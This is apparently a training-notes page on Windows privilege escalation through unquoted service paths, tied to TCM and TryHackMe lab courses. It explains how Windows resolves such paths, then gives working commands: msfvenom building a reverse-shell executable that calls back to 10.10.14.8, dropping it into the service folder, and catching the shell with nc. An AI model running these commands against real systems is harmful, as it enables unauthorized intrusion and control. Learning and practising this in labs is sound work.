Unquoted Service Paths

Overview

Unquotes service paths is similar to binary path exploitation, however the vulnerability lays in the fact that the path to the executable is unquoted.

When the service is started Windows looks through every word in the path separated with a space and test .exe

  • C:\Program.exe - NO

  • C:\Program Files.exe - NO

  • C:\Program Files\Unquoted.exe - NO

  • C:\Program Files\Unquoted Path.exe - NO

And so on...

Exploitation via PowerUp

Run PowerUp and search for Unquoted Service Paths section

TCM Windows Priv Esc Try Hack Me

Create and drop a malicious executable

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.exe
cp C:\temp\Common.exe C:\Program Files\Unquoted Path Service\Common.exe

Start a listener and the service

nc -lnvp 1337
sc start unquotedsvc
PreviousBinary PathsNextgetsystem

Last updated

Was this helpful?